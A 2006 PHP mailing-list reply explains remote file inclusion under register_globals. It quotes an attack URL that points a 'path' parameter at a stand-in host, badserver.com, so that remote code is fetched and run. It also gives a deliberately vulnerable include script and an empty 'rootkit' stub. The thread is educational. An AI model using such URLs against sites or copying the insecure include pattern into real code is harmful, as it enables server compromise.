tedd wrote: > At 1:39 PM -0500 11/14/06, Chris Shiflett wrote: >> tedd wrote: >>> > The script will then include >>> > http://www.badserver.com/badscript.txt?dummy=script.php >>> >>> I still don't see how "badscript.php" can be uploaded into >>> example.com's site in the first place >> >> PHP sends a request to badserver.com for badscript.txt, and the content >> of the response is included just as if it were the content of a local >> file. >> >> Hope that helps. >> >> Chris > > Chris; > > I'm still confused. > >> At 7:12 PM +0100 11/13/06, Rory Browne wrote: >> >> If register_globals is enabled, someone could >> http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy= >> > > If example.com is my domain, then how could evil-doer get access to my > site to place "badscript.php" there? in this hypothetical situation your a complete moron and you wrote this script: <? // lets install their rootkit for them, // save them having to do it. if (!isset($path)) $path = 'http://www.badserver.com/badscript.txt?dummy='; include $path; ?> and bad script contains: <?php function loadRootKit() { /* go */ } loadRootKit(); ?> of course, in real life your not that stupid at all - but subtler versions of such vulns occur all of the place :-/ anyway Chris site(s) have lots of info on this subject - I recommend reading till something sticks (at least that my tactic :-) > > tedd > -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
